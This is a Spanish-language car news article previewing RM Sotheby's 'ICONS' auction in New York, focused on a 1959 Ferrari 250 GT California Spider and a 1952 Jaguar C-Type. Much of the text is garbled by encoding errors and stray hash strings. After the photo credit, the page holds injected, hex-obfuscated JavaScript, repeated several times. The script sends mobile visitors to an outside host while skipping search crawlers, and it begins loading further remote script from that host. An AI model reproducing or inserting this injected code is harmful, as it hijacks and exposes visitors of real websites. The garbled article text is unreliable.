Hoy estamos de remate en Nueva York

Master
e4ed4757c0833faf31b10e1641af93d22e503c85
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

de68e4326e6f3f4527227f90ab2561cf3eb058fe

Ya estamos en las horas previas del importante remate que tendrA? lugar hoy miAi??rcoles 6 de diciembre en Nueva York, EE.UU., organizado por la casa de subastas RM Sothebyai???s. Bautizado “ICONS”, este remate tendrA? lugar en la elegante sede de Sothebyai???s, en pleno Manhattan.

Dos de los lotes mA?s destacados del catA?logo son un par de leyendas con pasado competitivo en Le Mans, construidos por dos de las marcas mA?s veneradas del mundo: por un lado un Jaguar C-Type de 1952 y, por el otro, la Ferrari 250 GT LWB California Spider Competizione del aAi??o 1959.

4423b32d64246b1bd0367754bc1248a7dbf023b8

8bef533634ca01231b151999d26b4fef46dd10f8

Un personaje vital en la historia de Ferrari y del automovilismo mundial, Luigi Chinetti era uno de los principales actores en la escena del automovilismo gringo sobre finales de la dAi??cada de los aAi??os cincuenta y comienzos de la siguiente. No sA?lo fue un piloto muy exitoso, sino que por entonces era el distribuidor de la marca en la Costa Este de los Estados Unidos y el hombre detrA?s del equipo de competiciA?n N.A.R.T. (North American Racing Team). Chinetti y N.A.R.T. inscribieron un trAi??o de Ferrari para la ediciA?n 1959 de las 24 Horas de Le Mans: una Ferrari 250 Testa Rossa, una 250 GT LWB Berlinetta y la 250 GT LWB California Spider chasis 1451 GT, el mismo ejemplar que saldrA? a remate al rato nomA?s en Nueva York.

La segunda de apenas ocho ejemplares construidos en aluminio de la California Spider y armada con todas las especificaciones “Competizione”, la 250 GT fue conducida en Le Mans por su propietario Bob Grossman, un exitoso vendedor de autos deportivos de Rockland County, en el estado de Nueva York. El auto saliA? de fA?brica apenas cinco dAi??as antes de Le Mans, con apenas una capa de pintura disimulando el primer y asientos sin terminar y recubiertos por parches. En la salida de bautismo en La Sarthe tanto para el propietario como para la Ferrari, Grossman junto a Fernand Tavano, consiguiA? un impresionante 5 puesto final y un podio en su categorAi??a. Luego de Le Mans, el chasis 1451 GT fue debidamente terminada en color plata metalizada y embarcado al garaje de Grossman del otro lado del ocAi??ano. Inmediatamente el auto volviA? a pista, compitiendo en eventos organizados por la SCCA en Bridgehampton y el Grand Prix de Watkins Glen, para luego ser enviado a Nassau para la Semana de la Velocidad en la capital de las Bahamas, donde consiguiA? la victoria en la carrera Memorial Trophy. La California Spider dejA? de estar al cuidado de Grossman luego de la temporada 1960, y cambiA? de manos entre varios propietarios americanos hasta caer en las de Jon Masterson, de California, quien decidiA? hacer una restauraciA?n completa, trabajo que la hizo merecedora de un primer premio en su categorAi??a en el Concours dai???Elegance de Pebble Beach. A partir de allAi?? el auto tuvo buena actividad, retornando en otra ediciA?n a Peeble Beach, participando de la Colorado Grand y corriendo en las carreras histA?ricas de Monterey, en el circuito de Laguna Seca, al menos en cuatro ediciones distintas.

4f81e0936d704ab044d1d2aa5463b6bf01818e06

a75c9b430350ca099fd680590217bc8e1b3d7d3e

Adquirido por su actual propietario una dAi??cada atrA?s, esta California Spider certificada por Ferrari Classiche continuA? apareciendo en algunos de los eventos de autos clA?sicos mA?s renombrados, antes de ser motivo de una nueva restauraciA?n por completo en el aAi??o 2011, a cargo del especialista en la marca, Motion Products Inc. Esa segunda restauraciA?n le valiA? el premio de platino en el Cavallino Classic del aAi??o 2011 y desde entonces ha sido posible apreciarla en diversos concursos y competencias. A su nuevo propietario lo esperan invitaciones a los mejores concursos y competencias histA?ricas del mundo, incluyendo la ediciA?n 2018 de Le Mans Classic. La California Spider estA? de regreso al mismo estado al que llegA? por primera vez en Estados Unidos, definitivamente convertida en una de las Ferrari mA?s importantes en existencia. Su estimado de venta va de los 14 a los 17 millones de dA?lares.

UniAi??ndose a la California Spider en Manhattan estA? otro auto cuya reputaciA?n se forjA? en las largas horas de Le Mans. Se trata del Jaguar C-Type chasis XKC 007. Conmbinando una tAi??cnica muy confiable con un bello trabajo de aerodinA?mica en su carrocerAi??a, tres C-Type del equipo oficial debutaron en la ediciA?n 1951 de Le Mans, uno de ellos convirtiendose en el primer auto de origen britA?nico en ganar en Le Mans luego de cerca de dos dAi??cadas. Jaguar reforzA? su apuesta con una nueva victoria en Le Mans dos aAi??os despuAi??s, y entre esas dos victorias se construyeron 43 unidades carrera-cliente, siendo este XKC 007 el sAi??ptimo de la saga. Se cree que este chasis fue el primero que llegA? a suelo norteamericano, siendo entregado a Charles Homburg, el distribuidor de la marca felina en la Costa Oeste, quien lo destinA? a la competiciA?n y a fines promocionales, especialmente en las manos del piloto californiano Phil Hill.

467acc2b93c9c643f56d37b8b5e0b3e4bf1c594e

0a8f97bea7f9917b0449718f62121551a9c0feb3

El C-Type debutA? en Elkhart Lake en septiembre de 1952, con Phill Hill al volante, quien a bordo de este auto viajA? de California a Wisconsin para participar de la competencia y tambiAi??n regresA? andando en Ai??l. Hill acabA? cuarto en el evento principal y tambiAi??n ganA? la Copa Sheldon, la primera victoria para un C-Type en suelo americano. El Jaguar fue a parar a manos de un listado de interesantes propietarios, quienes tambiAi??n compitieron a bordo de Ai??l, hasta que el britA?nico Jeffrey Patinson lo adquiriA? y comisionA? un trabajo de restauraciA?n a fondo al especialista en Jaguar, Terry Larson. XKC 007 fue luego vendido al coleccionista Gary Bartlett, de Indiana, quien le encargA? a otro renombrado especialista, Chris Keith-Lucas, la preparaciA?n del auto para eventos vintage, incluyendo la Mille Miglia de 2010 y el Concours dai???Elegance de Amelia Island. Bajo cuidado de su actual propietario, el Jaguar continuA? disfrutando una vida rodeada de cariAi??o y cuidados. Ofreciendo su rareza, el pedigrAi?? de carreras, ese diseAi??o que trascendiA? en la historia y uno de los mA?s emblemA?ticos dibujos de carrocerAi??a jamas concebidos, el C-Type es una leyenda viva y, sin duda, un Ai??cono del automovilismo que se estima alcanzarA? un precio de venta entre 5 millones y medio y 7 millones de dA?lares.

24b57f04fcd82a3c6558996315d852896d9ac353

5fc96cbbc6a1fc516d81bea3600e2c214a18b2ec

El California Spider y el C-Type son las estrellas de un firmamento compuesto por 31 automA?viles emblemA?ticos que saldrA?n a la venta maAi??ana miAi??rcoles 6 de diciembre en la subasta “ICONS”, y que van desde bellezas de la era clA?sica a los mA?s tecnolA?gicamente avanzados hiperdeportivos de la actualidad. TambiAi??n podemos destacar los siguientes lotes en el catA?logo:

El Marmon Sixteen Convertible Coupe de 1932 (chasis # 144 859) es uno de apenas ocho ejemplares sobrevivientes de esta obra maestra gringa del diseAi??o y la ingenierAi??a (precio estimado: u$s 1.250.000-1.500.000).

a0dd57ac5bf0aed767b58922ed205f47a30ba8b4

QuizA? la pareja de autos mA?s emblemA?tica: un Mercedes-Benz 300 SL “Alas de Gaviota” (chasis # 198.040.5500593), ejemplar perfectamente restaurado del primer auto sport que se convirtiA? en un sAi??mbolo de status reconocible (Precio estimado: u$s 1.300.000-1.500.000) y un excepcional Mercedes-Benz 300 SL Roadster de 1958 (chasis # 198.042.7500649), la A?ltima restauraciA?n completa realizada por Rudi & Company en sus talleres de British Columbia (u$s 1.250.000-1.500.000).

Un Aston Martin DB5 Convertible de 1965 ganador de mA?ltiples premios (chasis #Ai??DB5C/1923/L, de la rara versiA?n convertible con volante a la izquierda salido asAi?? de fA?brica de uno de los autos mA?s reconocibles alrededor del mundo (precio estimado: u$s 2.450.000-2.650.000).

60e47cb6b303833ab600103cfea8bc66c2955a1c

dc2098587580db1d38be07138511d0c7827a487b

Una muy documentada y certificada por “Ferrari Classiche” 365 GTB/4 Daytona Berlinetta de 1969 (chasis # 12301), que fue el prototipo final de este modelo y a la vez el primer ejemplar de producciA?n del Daytona (precio estimado: u$s 1.400.000-1.700.000).

Una Ferrari F40 1990 de bajo kilometraje (chasis #87144), seguramente entre los mA?s emblemA?ticos automA?viles de la generaciA?n de hombres de alrededor de 40 aAi??os (precio estimado u$s 1.200.000-1.400.000).ai???

1dcfdf76be7a23436d00af047937504b94021043

Y un grupo de modernos hypercars que incluyen una Ferrari LaFerrari 2014 (chasis 204687), la muestra tecnolA?gica mA?s impresionante y de uso legal del “cavallino” (precio estimado: u$s 3.250.000-3.750.000); uno de los 100 ejemplares de Pagani Huayra (chasis #78), el sensacional modelo de la compaAi??Ai??a fundada por el argentino Horacio Pagani (precio estimado: u$s 1.900.000-2.300.000) y una Bugatti Chiron 2018 (chasis #069), capaz de alcanzar los 400 km/h, el primer ejemplar de este modelo vendido en Estados Unidos y una maravilla de diseAi??o del Siglo 21 (prezio estimado: u$s 3.500.000-4.000.000).

La subasta “ICONS” de RM Sothebyai???s celebra los mA?s exclusivo del diseAi??o automotriz y hace parte de la agenda de una semana de duraciA?n con subastas y eventos organizados por la divisiA?n “A Life of Luxury” de la legendaria casa de remates nacida en Inglaterra.

Fotos: RM Sothebyai???s

1475574_LWB_CAL[1]

12c958f69c51e9c9bdf51425c97ea9e5f509f809

b57a496589f9d018caf6f4a874b3d059ad190267var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x